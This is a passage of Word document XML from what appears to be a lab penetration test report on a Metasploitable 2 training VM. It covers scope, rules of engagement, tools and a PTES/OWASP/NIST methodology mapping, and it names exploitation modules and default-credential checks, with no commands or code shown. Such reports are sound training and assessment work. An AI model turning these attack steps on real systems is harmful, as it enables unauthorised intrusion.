    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="300" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1.2  Scope and Authorisation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The engagement scope was explicitly defined as a single-host penetration test:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="595959"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 2: Assessment Scope Parameters</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9026"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="2E74B5" w:sz="4"/>
          <w:left w:val="single" w:color="2E74B5" w:sz="4"/>
          <w:bottom w:val="single" w:color="2E74B5" w:sz="4"/>
          <w:right w:val="single" w:color="2E74B5" w:sz="4"/>
          <w:insideH w:val="single" w:color="CCCCCC" w:sz="2"/>
          <w:insideV w:val="single" w:color="CCCCCC" w:sz="2"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="100"/>
        <w:gridCol w:w="100"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:shd w:fill="1F3864"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20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Parameter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6227"/>
            <w:shd w:fill="1F3864"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20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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Target IP Address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6227"/>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10.0.2.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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IP Range / CIDR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6227"/>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10.0.2.9/32 (single host)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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Network Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6227"/>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Internal isolated laboratory network</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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Target System</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6227"/>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Metasploitable 2 — Deliberately vulnerable training VM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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Testing Period</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6227"/>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October 2025</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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Out of Scope</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6227"/>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Any host or network segment outside 10.0.2.9/32</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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Prohibited Actions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6227"/>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Destructive attacks, data modification, denial-of-service</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="300" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1.3  Rules of Engagement</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All testing was confined strictly to the designated target host at 10.0.2.9</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No destructive payloads or denial-of-service attacks were deployed</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All exploitation attempts were performed in a controlled, documented manner</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The lab environment ensured no risk to production systems or real user data</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Findings were documented in real time; evidence (screenshots) was captured contemporaneously</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="300" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1.4  Testing Environment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="595959"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 3: Lab Environment Configuration</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9026"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="2E74B5" w:sz="4"/>
          <w:left w:val="single" w:color="2E74B5" w:sz="4"/>
          <w:bottom w:val="single" w:color="2E74B5" w:sz="4"/>
          <w:right w:val="single" w:color="2E74B5" w:sz="4"/>
          <w:insideH w:val="single" w:color="CCCCCC" w:sz="2"/>
          <w:insideV w:val="single" w:color="CCCCCC" w:sz="2"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="100"/>
        <w:gridCol w:w="100"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:shd w:fill="1F3864"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20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6227"/>
            <w:shd w:fill="1F3864"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20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Details</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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Attacker Machine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6227"/>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Kali Linux (rolling release)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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Primary Scanning Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6227"/>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Nmap 7.95</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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Exploitation Framework</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6227"/>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Metasploit Framework (msfconsole)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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Target Machine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6227"/>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Metasploitable 2 — Linux (Ubuntu 8.04)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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Network Topology</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6227"/>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Isolated host-only or NAT lab network (no external internet access)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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Network Role of Target</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6227"/>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Internal / private address space (10.0.2.x)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="420" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">2.  Methodology</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The assessment methodology was structured in alignment with three recognised industry frameworks: the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Penetration Testing Execution Standard (PTES)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP Testing Guide</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">NIST SP 800-115</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Technical Guide to Information Security Testing). This multi-framework approach ensures comprehensive coverage, repeatability, and professional rigour.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="300" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2.1  Penetration Testing Execution Standard (PTES)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The PTES defines seven phases for a complete penetration test. The following table maps each PTES phase to the activities performed in this engagement:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="595959"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 4: PTES Phase Mapping</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9026"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="2E74B5" w:sz="4"/>
          <w:left w:val="single" w:color="2E74B5" w:sz="4"/>
          <w:bottom w:val="single" w:color="2E74B5" w:sz="4"/>
          <w:right w:val="single" w:color="2E74B5" w:sz="4"/>
          <w:insideH w:val="single" w:color="CCCCCC" w:sz="2"/>
          <w:insideV w:val="single" w:color="CCCCCC" w:sz="2"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="100"/>
        <w:gridCol w:w="100"/>
        <w:gridCol w:w="100"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2200"/>
            <w:shd w:fill="1F3864"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20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">PTES Phase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5827"/>
            <w:shd w:fill="1F3864"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20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Activities in This Engagement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1000"/>
            <w:shd w:fill="1F3864"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20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Completed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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1. Pre-Engagement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5827"/>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Scope definition, rules of engagement, lab environment setup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="10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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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2. Intelligence Gathering</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5827"/>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Nmap -sV service/version enumeration of all 65,535 TCP ports</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="10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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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3. Threat Modelling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5827"/>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Service risk analysis; identification of high-value attack surfaces</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="10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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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4. Vulnerability Analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5827"/>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CVE mapping; CVSS scoring; service-level vulnerability assessment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="10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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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5. Exploitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5827"/>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Metasploit modules: Samba usermap_script, PostgreSQL payload, Tomcat WAR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="10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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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6. Post-Exploitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5827"/>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Session analysis; impact assessment; privilege evaluation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="10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Partial</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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7. Reporting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5827"/>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Findings documentation; risk ratings; remediation recommendations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="10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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="300" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2.2  OWASP Testing Guide</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Although the OWASP Testing Guide is primarily focused on web application security, several of its testing categories are directly relevant to the web services identified on the target. The following OWASP test categories informed the assessment of web-facing services:</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OTG-INFO-001 to 009 — Information Gathering: Applied during Nmap enumeration of HTTP (port 80), Tomcat (port 8180), and AJP (port 8009) services</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OTG-CONFIG-002 — Application Platform Configuration: Applied when assessing Apache Tomcat Manager accessibility and default credential exposure</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OTG-CONFIG-006 — HTTP Methods Testing: Relevant to the Apache HTTP server on port 80</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OTG-AUTHN — Authentication Testing: Applied when assessing PostgreSQL, MySQL, VNC, and Tomcat Manager default credentials</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="300" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2.3  NIST SP 800-115</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">NIST SP 800-115 (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Technical Guide to Information Security Testing and Assessment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) provides a structured approach to security testing. The engagement phases map to the NIST framework as follows:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="595959"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 5: NIST SP 800-115 Phase Mapping</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9026"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="2E74B5" w:sz="4"/>
          <w:left w:val="single" w:color="2E74B5" w:sz="4"/>
          <w:bottom w:val="single" w:color="2E74B5" w:sz="4"/>
          <w:right w:val="single" w:color="2E74B5" w:sz="4"/>
          <w:insideH w:val="single" w:color="CCCCCC" w:sz="2"/>
          <w:insideV w:val="single" w:color="CCCCCC" w:sz="2"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="100"/>
        <w:gridCol w:w="100"/>
